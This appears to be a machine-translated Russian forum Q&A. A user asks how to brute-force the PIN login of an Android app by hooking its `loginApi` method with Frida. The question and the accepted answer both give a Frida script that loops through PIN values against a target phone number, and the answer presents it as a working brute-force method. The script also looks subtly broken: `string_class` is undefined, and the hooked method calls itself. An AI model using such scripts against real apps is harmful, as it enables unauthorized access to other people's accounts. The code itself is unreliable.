Метод входа в систему BruteForce на android с использованием Frida
Я столкнулся с проблемой при попытке перебора приложения. Код метода приведен ниже.
private fun loginApi(phone: String, pin: String) {
if (firebase_token.isEmpty()) {
//
}else {
showDialog()
//
// Code to call api and perform authentication
}
Я попробовал приведенный ниже код, но он не работает.
Java.perform(function () {
var OTPActivity = Java.use('com.example.example.Getstarted.FragmentOtpVerification');
OTPActivity.loginApi.overload("java.lang.String", "java.lang.String").implementation = function(phone_no, pin){
for(var i=1140; i<1151; i++)
{
send(i);
var my_phone = string_class.$new('/*Number over here*/');
var my_pin = string_class.$new(i);
var result = this.loginApi(my_phone, my_pin);
console.info(result);
}
console.info('Done:');
};
});
Я пытаюсь использовать этот метод методом перебора. Любая помощь будет оценена по достоинству.
Прямо сейчас я застрял из-за того, что не могу преобразовать Int в String, так как при просмотре adb logcat возникает ошибка, поскольку класс «java.util.String» не найден. Можете ли вы помочь мне в невозможности преобразовать Int в String?
—
07.04.2021 10:19
В приведенном выше коде проблема была с var my_pin = string_class.$new(i);. Но теперь я застрял в преобразовании Int в String.
—
07.04.2021 10:20
0
3
13
1
Ответы 1
Мне удалось перебрать метод, просто манипулируя оператором преобразования Int в String. Перередактированный код можно увидеть ниже:
Java.perform(function () {
var OTPActivity = Java.use('com.example.example.Getstarted.FragmentOtpVerification');
OTPActivity.loginApi.overload("java.lang.String", "java.lang.String").implementation = function(phone_no, pin){
for(var i=1140; i<1151; i++)
{
send(i);
var my_phone = string_class.$new('/*Number over here*/');
var my_pin = i + ""; /* Changed over here. */
var result = this.loginApi(my_phone, my_pin);
console.info(result);
}
console.info('Done:');
};
});
Другие вопросы по теме
Можем ли мы предсказать время, которое потребуется для перебора слова, учитывая длину слова и набор символов, которые нужно изучить?
Crypto JS: Можете ли вы замедлить расшифровку без экспоненциального увеличения размера файла?
Как ускорить мою атаку методом грубой силы с помощью Python
Найдите минимальное количество мостов, необходимое для соединения всех островов в двумерной двоичной матрице
Лучшая практика против атак со списком паролей с помощью веб-приложений
Предотвращение входа в систему методом грубой силы на веб-сайтах
Является ли предпочтение решениям методом грубой силы плохим знаком?
Подсчет количества операций для подходов грубой силы
Необходимость скрывать соль для хеша
Какие практические проблемы могут решить параллельные вычисления, f # и параллельная обработка на GPU?
Похожие вопросы
Как сохранить URL-адрес из запроса объекта JSON, когда поле URL-адреса объекта JSON содержит несколько URL-адресов в студии Android?
Какие современные библиотеки диаграмм для Android являются лучшими?
Для работы плагина Android Gradle требуется Java 11. В настоящее время вы используете Java 1.8
OnBindViewHolder получает вызов для всех элементов вложенных горизонтальных recyclerviews
Инициализация нулевого объекта и переход между действиями перед сохранением
Как сохранить панель навигации во флаттере
Как автоматически горизонтально прокручивать текстовое представление с любой длиной текста?
При сохранении отфильтрованного изображения приложение вылетает, моя ошибка logcat ниже
Разница между байт-кодом Java и байт-кодом Kotlin
Перенос Android-проекта на частный сервер Git
Извините, но вы должны более конкретно рассказать о своей проблеме, просто написать «не работает» - это ничем, с чем мы можем вам помочь. Отредактируйте вопрос и точно опишите, в чем проблема с вашим кодом.